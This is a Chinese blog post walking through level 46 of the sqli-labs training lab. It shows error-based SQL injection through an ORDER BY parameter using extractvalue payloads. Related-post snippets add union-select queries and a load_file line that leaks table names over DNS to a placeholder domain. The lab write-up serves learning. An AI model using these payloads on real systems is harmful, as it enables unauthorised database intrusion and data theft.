sqllab第四十六关通关笔记

最新推荐文章于 2025-12-21 15:55:57 发布
原创 最新推荐文章于 2025-12-21 15:55:57 发布 · 374 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#笔记 #sqllab

文章讲述了作者通过实验发现,尽管在尝试错误注入时最初遇到异常,但通过构造特定的payload,如`sort=0%20and%20extractvalue(1,concat(0x7e,database(),0x7e))`,成功实现了对数据库名的提取,展示了SQL注入攻击中利用错误处理机制获取敏感信息的方法。

知识点:

  • order by 可以判断字段数
  • 这里可以使用extractvalue()和updatexml()函数进行报错注入

通过测试发现原始语句为 select 1,2,3 from 表名 order by sort

只有三个字段,输入的信息作为排序的字段

构造sort=1,2,3,4(分别输入),测试处只有三个字段

通过单引号输入发现页面打印出了完整的错误信息

这里应该是一个数值型注入

尝试进行错误注入

构造payload:sort=0%20and%20exp(720)#

发现页面正常输出,这就怪了,为啥会这样呢???难道不能用错误注入

尝试使用其他的错误函数

构造payload:sort=0%20and%20extractvalue(1,concat(0x7e,database(),0x7e))#

成功回显出了数据库名,同理可以获取数据库其他信息

10

sqli-labs闯笔记
qq_41738909的博客
01-13 640
3.报错了典型的单引号注入,顺着单引号注入开干!3没报错有三列,4报错了证明有最多有3列。7.看到了username,password这俩就是目标了!id=1在后面加上',"判断是个啥注入方式。5.得到了数据库名字'security' 开始爆库。4. 查看一下他有哪些库和数据库版本。6.拿到了库名,开始爆表。1.打开页面观察一下。
sqli-labs通关笔记
m0_67795959的博客
10-23 1238
id=1' and (select load_file(concat("//",(select table_name from information_schema.tables where table_schema = database() limit 3,1),".域名/123.txt")))--+要写为rand(0) 或者rand(4):rand()函数的执行速度要比 group by查询并插入key值的速度更快,只有rand(0)这个顺序可以导致在插入第三个数据,rand执行第五次时导致键值冲突。
sqllab通关笔记(汇总)
I_WORM的博客
03-18 666
10。
sqllab靶场通关详解(前22
weixin_43433141的博客
01-21 996
作者使用phpstudy将靶场放置在本地环境中,配置如下:直接在浏览器中输入127.0.0.1/sql进行访问即可,有问题可以注公众号回复【好友】私聊笔者。
sql-labs通关笔记
jilinyi的博客
07-03 909
输入-admin' union select database(),(select group_concat(table_name) from information_schema.tables where table_schema='security')-- +可得到'security'数据库下存在'emails'、'referers'、'uagent'、'users'表。与第13类似,只需将注入语句中的admin') or 1=1-- +更改为admin" or 1=1-- +即可,后续操作相同。
Sql-labs 第42 - 53 通过笔记
weixin_45619494的博客
10-09 456
看页面情况是和rand(1)相同还是rand(0)看页面情况是和rand(1)相同还是rand(0)sort=rand() 页面发生变化,为数字型。sort=1 desc/asc 发现可以排序。password = Dumb')#页面正常。那就是password处有注入,闭合为'尝试报错payload,都试一下,没用。和第50差不多,就是用 ' 闭合。估计为时间盲注 或 bool盲注。访问第一,看下,发现成功修改。发现页面不一样,但是没用回显。半自动化脚本发现为 ' 闭合。访问第一·,发现成功修改。
SQL注入从入门到进阶:sqli-labs靶场通关笔记
tzyyyyyy的博客
09-26 9570
SQL注入从入门到进阶:sqli-labs全通关笔记 Less-1~Less64
sqli-labs 通关笔记详解 Less1 - Less10
HAKUNAMATATATTA的博客
12-18 3792
做sqli-labs靶场之前建议补一下基础。
学习笔记四:sql手工注入
mcc的博客
06-05 1324
sql-labs靶机通关 原文链接:http://p0desta.com/2018/01/28/Sqli_labs%E9%80%9A%E5%85%B3%E6%96%87%E6%A1%A3/#less-29 1.Less-1 暴库 $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; #检查是否存在漏洞 http://127.0.0.1/4/L...
DVWA 共12通关笔记
09-12
【DVWA 共12通关笔记】 DVWA(Damn Vulnerable Web Application)是一个用于网络安全教育的开源Web应用程序。它包含各种安全漏洞,为初学者和专业人士提供了实践和学习Web安全漏洞的机会。DVWA分为多个级别,从低...
SQLi-Labs靶场通关笔记(1~21
trdtyvu的博客
07-06 3399
SQLi-Labs是一个专注于SQL注入的在线靶场,通过模拟真实的Web应用环境,帮助安全爱好者提高SQL注入的防范和应对能力。它一共有65个卡,其中卡的类型有但不限于联合查询注入,报错注入,布尔盲注,延时盲注,POST注入,Cookie注入,WAF绕过……可以看出,涵盖的范围还是很广的,对于我们初学注入的人来说很友好。首页可以选择卡。
SQL注入:sqli-labs靶场通关(第十五——第二十
l258282的博客
12-14 1064
使用1 or 1=1 和 1 or 1=2发现页面正常。输入1’发现并没有报错,输入1"发现也没有报错。1'1"这次连闭合报错的信息都没有了,所以不能用报错注入了。这里可以用布尔盲注或时间盲注。
TK_网络基础和常见攻击(笔记
最新发布
汤小萌的博客
12-21 568
它确保内网中每一个IP地址的使用者都是经过授权、身份明确的设备,防止“内鬼”作乱。再vlan下启用user-bind报表检查(也可以在接口下,但是范围更小一些)它不信任外部来的报文,通过路径反查,过滤掉大量源IP不。没有命中的arp报文会认为是非法的而丢弃。真实(伪造)的攻击流量,如反射放大攻击。发送第一个数据包时进行拦截。企图毒化他人缓存时进行阻断。:按攻击发生的时间顺序。网络的第一步就进行控制。:在攻击者接入网络后,是否在同一个隔离组。
Javaweb 学习笔记——html+css
hssfscv的博客
12-18 909
以上是Javaweb中于前端html和css的相内容,主要制作了两个页面,了解了如何使用AI生成我们需要的内容,有利于了解前端知识,接下来将进行剩余前端知识的学习
【算法笔记】AC自动机
u012559967的专栏
12-19 721
AC自动机: AC自动机是一种高效的多模式字符串匹配算法,它巧妙地将 Trie树的字典结构与 KMP算法的失配指针思想相结合,能同时在一段文本中查找多个模式串的所有出现位置,广泛应用于敏感词过滤、生物信息学序列分析等领域。在字符串匹配领域,我们会遇到两类问题:单模式匹配:给定一个文本字符串和一个模式字符串,判断模式字符串是否出现在文本字符串中。《【算法笔记】KMP算法》多模式匹配:给定一个文本字符串和多个模式字符串,判断所有模式字符串是否出现在文本字符串中。解决方案:AC自动机算法。
【大模型】happy-llm笔记
weixin_45207619的博客
12-16 175
今天看了这套课程的第二章到第四章的内容,对自己一直以来好奇的一些llm相的问题有了解答。将我遇到的问题整理到下面,部分可能没有回答,感兴趣的同学可以去原课程查找。happy-llm是datawhale发布的一套于llm的教程,链接。
MySQL 学习笔记(进阶篇2)
2302_79807388的博客
12-20 697
(1) 视图(View)是一种虚拟存在的表。视图中的数据并不在数据库中实际存在,行和列数据来自定义视图的查询中使用的表,并且是在使用视图时动态生成的。(2) 通俗的讲,视图只保存了查询的SQL逻辑,不保存查询结果。所以我们在创建视图的时候,主要的工作就落在创建这条SQL查询语句上。① 没有:不会检查当前视图的WHERE条件,即使数据不满足该条件,也能成功存入基表;但后续查询该视图时,这条不满足条件的数据不会在视图结果中显示② 有 check option:会按LOCALCASCADED。
学习笔记——写时复制(Copy-on-Write)
2301_78295956的博客
12-16 712
摘要:写时复制(COW)是一种延迟资源复制的优化技术,多个调用者初始共享同一资源,仅当修改时才创建副本。该技术通过引用计数和内存页保护实现透明操作,显著提升fork()等系统调用性能,减少内存占用。广泛应用于操作系统、编程语言和存储系统,虽存在首次写入延迟等缺点,但通过批量复制等优化策略可缓解。COW体现了"延迟优化"的设计思维,在资源节约和性能间取得平衡。
Agent 智能体的经典三范式——笔记
子墨将的博客
12-17 823
定义ReAction的交互规范提示词主要由以下部分组成角色:设定智能体的角色工具清单:掌握与外界交互的能力输出规范:【Thought】/【Action],核心点,严格规范LLM以格式化输出,方便程序解析下一步行动该是思考,还是行动动态上下文:记录起始问题,以及过往的思考、行动结果# ReAct 提示词模板 REACT_PROMPT_TEMPLATE = """请注意,你是一个有能力调用外部工具的智能助手。
DVWA安全挑战:12通关攻略笔记
DVWA共12通关笔记涵盖了DVWA的12个不同的难度等级,每个等级都有不同的安全缺陷和配置,用户需要利用这些缺陷来完成攻击任务。从最简单的默认密码和常见的SQL注入,到更高级的漏洞利用,这些练习可以帮助用户理解...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

I_WORM

大佬们,赏点儿碎银吧~~

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值